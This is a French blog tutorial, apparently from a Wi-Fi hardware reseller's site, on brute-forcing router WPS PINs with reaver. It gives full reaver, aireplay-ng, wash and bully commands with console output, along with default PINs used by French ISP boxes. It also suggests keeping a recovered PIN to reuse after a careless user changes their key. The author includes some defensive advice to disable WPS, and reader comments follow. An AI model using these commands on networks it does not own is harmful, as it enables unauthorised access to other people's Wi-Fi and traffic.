Visitez la boutique Wifi-highpower.com, votre revendeur officiel Alfa Network: du matériel Wifi sélectionné, cartes Wifi USB Awus036h et Awus036nhv, antennes omnis, yagis, panel, amplis wifi, accessoires...

Reaver et le WPS (Wi-Fi Protected Setup)

Hey ! 🙂

 

Aujourd’hui on va parler de reaver servant a mener des attaques contre le WPS (wifi protected setup).Tout d’abord petit rappel des faits, reaver est un outil créer pour tester la sécurité des réseaux sans fil équipés du WPS .Le fonctionnement et simple, il s’agit de tester par bruteforce le code PIN a 8 chiffres utilisé par le routeur afin de retrouver la fameuse clé WPA servant a protéger le réseau.A l’époque, c’était un peu comme aller dans un parc d’attraction sans avoir a en payé l’entrée car beaucoup de routeurs étaient vulnérables a cette attaque.

img_wps

Oui mais… depuis sa sortie les points d’accès ont aussi évolué et la plupart des attaques échouent a ce jour.Ready to test ? 😉

Le WPS fonctionne sous le principe suivant, le code PIN se compose de 8 chiffres, comme ça vous allez me dire 8 chiffres ça fait beaucoup de possibilités a tester… en faite pas vraiment quand on sait que le huitième chiffre et le contrôle des 7 autres.Autrement dit, on a pas besoin de tenter toutes les possibilités car le code PIN se fait hara-kiri tout seul 😛

Prenons l’exemple avec le code suivant: 34536896 on décompose 3x3+1x4+3x5+1x3+3x6+1x8+3x9+1x6=90, une fois qu’on a appliqué le modulo 10 on obtient 0 car on a enlevé 9×10.Sachant donc comment se compose a la base un pin on peut réduire considérablement le nombre de test, ce qui donne une attaque très rapide sur un routeur vulnérable.Le reverse engineering a plus que fait ses preuves dans le domaine avec la génération des pin pour D-link, TP-Link.. et j’en passe.

Et sur nos box ça donne quoi ? on y vient 🙂

Configuration de test: une neufbox6 de chez sfr et un ordinateur sous kali-linux avec une carte wifi alfa AWUS036H ->> muni d’un driver de type RT8187L je recommande fortement ce matériel pour vos tests.

-1 les bases

Lancement de la carte en mode monitor et sniffing des réseaux wifi environnants puis début du test.

Ps: je recommande de stoper network-manager avant pour éviter les conflits

Dans un terminal lancez:
airmon-ng start wlan0
wash -i mon0

ça va afficher les réseaux potentiellement vulnérables, vérifiez que la colonne « WPS locked » soit bien a zéro, maintenant viens la commande de reaver, le grand classique qui a fait fureur.

reaver -i mon0 -c 1 -b 00:11:22:33:44:55 -vv

Mais soyons sérieux… de nos jours cette commande a assez peu de chance de fonctionner.Si on veut avoir une chance on va préférer utiliser d’autres commandes, exemple:

reaver -i mon0 -b 30:7E:CB:AE:A3:44 -a -v -c 6 -r 1:60 -L -S
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching mon0 to channel 6
[?] Restore previous session for 30:7E:CB:AE:A3:44? [n/Y] n
[+] Waiting for beacon from 30:7E:CB:AE:A3:44
[+] Associated with 30:7E:CB:AE:A3:44 (ESSID: SFR_A340)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred

 

On constate l’échec immédiat de l’attaque a cause d’un « timeout », comment donc passer cette étape ?

Avec aireplay-ng tout simplement 😉

aireplay-ng -1 120 -a 30:7E:CB:AE:A3:44 -e SFR_A340 -h 00:C0:CA:75:88:87 --ignore-negative-one mon0

On voit de suite la différence dans la console de reaver.

Capture du 2015-02-15 00:03:03

L’attaque se poursuit selon les paramètres de la commande, d’ailleurs venons-y:

reaver -i mon0 -c 6 -A -b 30:7E:CB:AE:A3:44 -vv -N -t 5 -L -r 1:60 -S

l’option principale a retenir est ici -r 1:60 qui signifie faire une pause de 60 secondes par PIN, ça semble beaucoup mais sur certains AP il faut bien ça.Évidement vous pouvez modifier ça a votre guise.Lentement mais plus efficacement, reaver poursuit le shmiclblick.

[+] Entering recurring delay of 60 seconds
[+] Trying pin 22225672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 0.05% complete @ 2015-02-15 00:06:30 (86 seconds/pin)
[+] Max time remaining at this rate: 262:39:30 (10995 pins left to try)
[+] Entering recurring delay of 60 seconds
[+] Trying pin 33335674

Sachant pertinemment que ma neufbox n’a aucun PIN en paramètre j’ai stoper l’attaque, maintenant voyons une tentative avec le WPS activé par défaut et reaver connaissant le PIN par défaut de la box.

 reaver -i mon0 -c 6 -A -b 30:7E:CB:AE:A3:44 -vv -p 63193084

 

Capture du 2015-02-15 02:12:24

C’est l’exemple typique de ce qui peut vous arriver si vous vérifiez pas que le WPS est désactivé sur votre box.Evidemment ça ne prendra pas 2 secondes comme dans l’exemple qui est choisi exprès pour illustrer la chose mais en quelques heures reaver arrivera a bout de votre routeur.

Notez l’apparition du M5 dans la console qui signifie que vous avez trouvé les 4 bon premiers chiffres du code, c’est utile de le savoir si pour une raison ou une autre l’attaque ne marche pas jusqu’au bout.Une fois la fameuse clé WPA obtenue, gardez le code pin sous la main car si un utilisateur négligent change sa clé mais pas son pin, il vous sera très facile de directement relancer reaver avec ce meme code 😛

le PIN par défaut en France est très fréquemment 12345670 sur les Livebox et Bbox, donc pas besoin de le stipuler avec l’option -p car dans ce cas reaver le testera en premier 😀 Rassurez-vous chez sfr le wps et activé mais le PIN non configuré donc reaver échouera, d’autre part les box aujourd’hui se défendent assez bien, seul Bouygues tarde un peu mais ils sont semble-t’il en train de faire des efforts.Le mieux, je le répète, c’est de désactiver le WPS de votre box via l’interface de gestion.

Comprendre  les erreurs fréquentes de reaver et les raisons si certaines attaques échouent:

– L’ap et trop loin ou il y a un problème d’association = « WARNING: Receive timeout occurred »
– L’ap se bloque a partir de X tentatives = « WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking »
– L’ap dispose bien du WPS mais le PIN n’est pas configurer faisant irrémédiablement échouer l’attaque.

Autres codes d’erreur: 0x02, 0x03, 0x04, il s’agit la d’erreur propre a chaque configuration (driver, ap, distance…) il n’y a pas de réponse globale juste des pistes.Néanmoins si vraiment vous n’y arrivez pas avec reaver il y a aussi wash et bully dont on parle moins mais qui font la même chose.Exemple avec bully:

 bully -b 30:7E:CB:AE:A3:44 -s 00:c0:ca:75:88:87 -E -l 90 -W -c 6 mon0

Capture du 2015-02-15 03:22:46

 

Il n’y a pas de solution miracle avec reaver ou les autres tools, les routeurs se modernisent et il n’est plus aussi évident qu’avant d’obtenir la clé WPA en utilisant reaver.Celui qui n’a aucune connaissance et qui passe par ici avec une version de kali fraîchement installée en pensant qu’il va « hack » tout ce qui bouge avec reaver se trompe.Si c’est la technique que vous choisissez il va falloir un peu de temps sachant que le résultat et aléatoire mais je pense qu’on s’accordera tousa dire que s’attaquer au wps des box et plus rapide et plus efficace qu’un bruteforce 😉

Par ailleurs, je rappelle la simplicité de lancer une attaque en boucle contre le wps et la méthode du PBC (push button configuration) décrite également sur ce site.Le wps est censé apporter une facilité a l’utilisateur mais ne garantie pas une sécurité fiable.Un wps désactivé et bonne clé wpa est la meilleure défense possible 😉

Catégorie : Sécurité, Technologie

1 Etoile2 Etoiles3 Etoiles4 Etoiles5 Etoiles (2 votes, average: 5,00 out of 5)
Loading...

Visitez la boutique Wifi-highpower.com, votre revendeur officiel Alfa Network: du matériel Wifi sélectionné, cartes Wifi USB Awus036h et Awus036nhv, antennes omnis, yagis, panel, amplis wifi, accessoires...

3 commentaires sur “Reaver et le WPS (Wi-Fi Protected Setup)”

  1. Un test toutes les 60sec et il faudrait … 7000 jours pour casser le code.

    Pas top.


  2. MDR , c’est sur que ‘est pas donné à tout le monde d’avoir 20 ans à perdre devant la console reaver …
    Toute façon je pense pas qu’il soit vraiment posible aujourd’hui de cracker quelque chose avec reaver.
    En totu cas jamais réussi même sur ma box .


  3. MK73DS, le 7 novembre 2016 à 20:41 a dit:

    Le maximum est 11000 tests.
    Cela donne un peu plus d’une semaine pour un test par minute. Et puis c’est rare de devoir aller jusqu’à : il y a autant de chance que ça soit le dernier pin testé que le premier !


Publier un commentaire


Un commentaire contenant des liens sera validé par l'administrateur avant toute publication.

*